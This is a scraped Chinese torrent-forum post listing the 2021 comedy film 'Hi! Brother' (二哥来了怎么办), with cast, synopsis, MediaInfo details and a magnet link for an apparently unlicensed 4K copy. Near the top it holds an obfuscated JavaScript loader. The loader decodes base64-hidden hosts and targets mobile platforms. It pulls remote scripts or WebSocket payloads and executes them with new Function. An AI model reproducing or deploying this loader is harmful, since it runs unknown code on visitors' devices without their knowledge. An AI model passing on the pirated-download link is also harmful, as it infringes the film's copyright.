二哥来了怎么办[国语音轨].Hi!.Brother.2021.WEB-DL.4K.H265.DDP.5.1 12.54GB

版主小s 1月前 222

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x46\x6a\x59\x48\x73\x4f\x52\x52\x45\x59']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxza2pmLm5pYYW5nYYW94aWFuc2hlbmcuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};

◎译  名 二哥来了怎么办 / 2哥来了怎么办 / 快把我2哥带走 / 快把我哥带走2 / Hi Brother / Go 2 Brother!
◎年  代 2021
◎产  地 中国大陆
◎类  别 喜剧
◎语  言 汉语普通话
◎上映日期 2021-07-16(中国大陆)
◎IMDb链接 https://www.imdb.com/title/tt12565346/
◎豆瓣评分 4.5/10 (11143人评价)
◎豆瓣链接 https://movie.douban.com/subject/30330751/
◎导  演 郑芬芬 Fenfen Cheng (id:1276077)
◎编  剧 郑芬芬 Fenfen Cheng (id:1276077)
◎演  员 胡先煦 Xianxu Hu (id:1329632)
       邓恩熙 Enxi Deng (id:1369977)
       郑伟 Wei Zheng (id:1325438)
       代乐乐 Lele Dai (id:1275749)
       陈希圣 Hsi-Sheng Chen (id:1331029)
       周奇 Qi Zhou (id:1404157)
       哈妮克孜 Hani Kyzy (id:1405772)
       高曙光 Shuguang Gao (id:1313422)
       陈都灵 Duling Chen (id:1342249)
       周政杰 Zhengjie Zhou (id:1420022)
       曾茂军 Maojun Zeng (id:1397615)
       陈有方 Youfang Chen (id:1456813)
       赖聪笔 Tsung-Pi Lai (id:1414969)
       周茂非 Maofei Zhou (id:1415002)
       曲萌 Ace Qu (id:1406485)
       曹广奎 Guangkui Cao (id:1458427)
       尹香今 Xiangjin Yin (id:1420797)
       李晔 Ye Li (id:1419666)
       商丹 Dan Shang (id:1419665)
       陈希圣 Hsi-Sheng Chen (id:1331029)
       吕旭 Xu Lü (id:1345807)
       李禹潼  (id:1456814)
       宗树阔  (id:1456815)
       侯宝英  (id:1456816)
       胡松峰 Songfeng Hu (id:1419670)
       蔡晨思  (id:1456817)
       褚姵君  (id:1456818)
       聂琳 Ling-Chieh Nieh (id:1378382)
       赵珂 Ke Zhao (id:1457600)
       胡宇桐 Tony Hu (id:1454695)
       田鸿杰 Hongjie Tian (id:1449995)
       李润祺 Runqi Li (id:1451879)
       马哲 Ma Zhe (id:1452329)
       李屏宾 Mark Lee Ping Bing (id:1274482)
       谢粤 Arden Tse (id:1451933)
       王楠  (id:1447751)
       都向东  (id:1456822)
       张英嗣  (id:1456823)
       郝钢 Gang Hao (id:1388362)
       万晓娟  (id:1456821)

◎标  签 家庭 / 青春 / 成长 / 2021 / 亲情 / 中国大陆 / 喜剧 / 校园

◎简  介
  故事讲述了关于重组家庭里吵闹而又温馨的那些事。杨听风(胡先煦 饰)杨听雨(邓恩熙 饰)是一对兄妹,自从杨妈妈与李叔叔再婚后,五花八门的尴尬大戏便在重组家庭中一直上演。这一天,不速之客李圣(郑伟 饰)突然出现,平静的生活就此乱套……天降2哥?父母偏心?亲哥也倒戈?这一连串的巨变令杨听雨不堪忍受,只想大喊一句:2哥来了怎么办!

  1. ##### MediaInfo ######

  2. General

  3. Unique ID                                : 219937585799155004314138399980743499964 (0xA5767030690B1E039F43CA0E374B20BC)

  4. Complete name                            : [email protected]

  5. Format                                   : Matroska

  6. Format version                           : Version 4

  7. File size                                : 12.5 GiB

  8. Duration                                 : 1 h 44 min

  9. Overall bit rate                         : 17.1 Mb/s

  10. Encoded date                             : UTC 2021-08-16 09:09:09

  11. Writing application                      : mkvmerge v58.0.0 ('Supper's Ready') 64-bit

  12. Writing library                          : libebml v1.4.2 + libmatroska v1.6.4


  13. Video

  14. ID                                       : 1

  15. Format                                   : HEVC

  16. Format/Info                              : High Efficiency Video Coding

  17. Format profile                           : [email protected]@Main

  18. Codec ID                                 : V_MPEGH/ISO/HEVC

  19. Duration                                 : 1 h 44 min

  20. Bit rate                                 : 16.7 Mb/s

  21. Width                                    : 3 840 pixels

  22. Height                                   : 2 080 pixels

  23. Display aspect ratio                     : 1.85:1

  24. Frame rate mode                          : Constant

  25. Frame rate                               : 24.000 FPS

  26. Color space                              : YUV

  27. Chroma subsampling                       : 4:2:0

  28. Bit depth                                : 8 bits

  29. Bits/(Pixel*Frame)                       : 0.087

  30. Stream size                              : 12.2 GiB (97%)

  31. Default                                  : Yes

  32. Forced                                   : No


  33. Audio #1

  34. ID                                       : 2

  35. Format                                   : E-AC-3

  36. Format/Info                              : Enhanced AC-3

  37. Commercial name                          : Dolby Digital Plus

  38. Codec ID                                 : A_EAC3

  39. Duration                                 : 1 h 44 min

  40. Bit rate mode                            : Constant

  41. Bit rate                                 : 256 kb/s

  42. Channel(s)                               : 6 channels

  43. Channel layout                           : L R C LFE Ls Rs

  44. Sampling rate                            : 48.0 kHz

  45. Frame rate                               : 31.250 FPS (1536 SPF)

  46. Compression mode                         : Lossy

  47. Stream size                              : 192 MiB (1%)

  48. Language                                 : Chinese

  49. Service kind                             : Complete Main

  50. Default                                  : Yes

  51. Forced                                   : No


  52. Audio #2

  53. ID                                       : 3

  54. Format                                   : AAC LC

  55. Format/Info                              : Advanced Audio Codec Low Complexity

  56. Codec ID                                 : A_AAC-2

  57. Duration                                 : 1 h 44 min

  58. Bit rate                                 : 192 kb/s

  59. Channel(s)                               : 2 channels

  60. Channel layout                           : L R

  61. Sampling rate                            : 44.1 kHz

  62. Frame rate                               : 43.066 FPS (1024 SPF)

  63. Compression mode                         : Lossy

  64. Stream size                              : 142 MiB (1%)

  65. Language                                 : Chinese

  66. Default                                  : No

  67. Forced                                   : No



TAGS 喜剧

磁力链:
  • magnet:?xt=urn:btih:E3EBD9BC70AE28671CD669015EC730E74D8D534A
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回